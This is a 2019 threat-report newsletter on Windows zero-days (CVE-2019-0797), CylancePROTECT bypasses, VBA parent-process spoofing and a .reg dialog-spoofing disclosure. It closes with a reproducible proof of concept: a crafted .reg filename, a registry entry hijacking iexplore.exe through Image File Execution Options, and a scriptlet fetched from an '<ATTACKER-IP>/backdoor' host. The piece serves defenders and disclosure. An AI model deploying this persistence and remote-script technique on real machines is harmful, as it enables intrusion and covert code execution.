Threat Report

Wednesday March 13th 2019

This week we’re going learn about some 0-day vulnerabilities that have been running wild. Then we’re going to close out with some techniques red teamers and threat actors are using to bypass controls, pop shells, escalate privilege, and own your systems.

Four horsemen of the exploit apocalypse ride wild

In February, researchers reported to Microsoft that attackers in the wild were using a 0-day exploit to escalate Windows privileges. Microsoft has just released a patch crediting Kaspersky Lab researchers, Vasiliy Berdnikov and Boris Larin, with the discovery of a vulnerability in win32k.sys, classified as CVE-2019-0797.

Like CVE-2018-8589, researchers believe this exploit is used by several threat actors including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to use 0-days, SandCat is a new APT discovered recently and was not previously known to use 0-days. In addition to CVE-2019-0797 and CHAINSHOT, SandCat also uses the FinFisher/FinSpy framework.

CVE-2019-0797 is a race condition that is present in the win32k driver due to a lack of proper synchronization between undocumented syscalls. In addition to CVE-2018 8589, CVE-2018-9611, and CHAINKILL, CVE-2019-0797 is, according to Kaspersky researchers, the fourth horseman in a wild 0-day apocalypse.

The exploit was targeting 64-bit operating systems in the range from Windows 8 to Windows 10 build 15063. The exploitation process is performed using heap spraying palettes and accelerator tables. In exploitation of Windows 10 build 14393 and higher, Windows are used instead of palettes. Besides that, the exploit performs a check on whether it’s running from Google Chrome and stops execution if it is because vulnerability CVE-2019-0797 can’t be exploited within a sandbox.

Sneaky sneaky bypasses

Last week we discussed some novel news in ransomware distribution which included a technique for bypassing windows security controls. Attackers haven’t stopped discovering new ways to distribute malware. Now they are compromising PirateBay accounts to seed out malicious files using trusty worthy looking accounts. Let’s check out some more sneaky techniques (Proof of Concept included) that attackers use land and stick their infections on Windows 10 with VBA macros and dialog box spoofing. Even when Cylance is present.

MDSec silences Cylance

At AppSecEU 2014 in Cambridge, I had the opportunity to take a mobile application hacking course with MDSec CEO and Mobile Application Hacker Handbook author, Domnic Chell. I am as impressed by the folks today at MDSec today as I was then. In a recent publication by his team, they describe bypassing some of the most common CylancePROTECT controls. For defenders using Cyclance, this provides insight into understanding where gaps in your security controls might exist and how to effectively layer complementary solutions to reduce risk.

Some of these gaps are straight forward. For instance, CylancePROTECT has no restrictions on Excel 4.0 macro enabled documents, even when explicitly blocked by policy. This provides an effective means for obtaining initial access in a Cylance environment. Old school evil Excel 4.0 macros have been covered in detail by Stan Hegt.

Other methods for bypassing Cylance are more complicated. For instance, it is possible to bypass CylancePROTECT powershell control if you rename the PS executable, execute it, and modify it in memory after execution to avoid impacting the signature of the binary. Quite brilliant. You should really read the entire write up on MDSec’s site for full details and more info about CylanceOPTICS.

VBA macro PoC for parent process spoofing

Most modern EDR solutions use behavioral detection, allowing the detection of malware based on how it behaves instead of solely using static indicators of compromise (IoC) like file hashes or domain names. In a recent post, Christophe gives a VBA implementation for two techniques allowing you to spoof both the parent process and the command line arguments of a newly created process. This implementation allows crafting stealthier Office macros, making a process spawned by a macro look like it has been created by another program such as explorer.exe, and has benign-looking command line arguments.

A Proof of Concept was released containing a VBA macro spawning a process with a spoofed parent and command line.

VBA Macro

Windows .reg file dialog box message spoofing

On March 10, a disclosure from @hyp3rlinx caught my eye related to dialog spoofing for Windows .reg files. But Microsoft has not acknowledged it as a vulnerability or failed to understand what was being reported as a vulnerability. Or, maybe this is a feature working as intended. According to the researcher, they received a response from Microsoft MSRC saying, “A registry file was created with the title you suggested, but the error message was clear.” and a link to the definition of a security vulnerability. It seems to me that if someone was able to override SSL certificate warning dialogs with a specially crafted certificate name then that would get some attention. Why is this not getting traction?

The Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user. This could trick users into choosing the wrong option in the dialog box. Also, it’s possible to suppress the modification status (Win 10), hiding successful registry modifications.

Normally when a user opens a .reg file UAC will launch, after they will get the registry security warning dialog box asking them if they “trust the source” and “Are you sure you want to continue?”

However, it is possible to inject your own pop up message and suppress successful registry modifications through a crafted filename.

Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us “the keys and values contained in have been successfully added to the registry”.

Here is a video of the PoC in action used to execute code from a remote host (you might want to mute the video) and here are steps to re-create it yourself:

1) Create a Windows .REG Registry file named.

"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

Registry file Contents.

Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe] 

"debugger"="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\";document.write();GetObject(\"script:http://<ATTACKER-IP>/backdoor\")" 

2) Create an XML file hosted at http://ATTACKER-IP/backdoor named simply as “backdoor” will execute Windows calc.exe when Microsoft Internet Explorer is launched.

<?xml version="1.0"?> 
<package> 
<component id="testCalc"> 
<script language="JScript"> 
<![CDATA[ 
new ActiveXObject("WScript.Shell").Run("calc.exe"); 
]]> 
</script> 
</component> 
</package> 

Paul Scott

Paul Scott
Has 6 Gold Stars
LinkedIn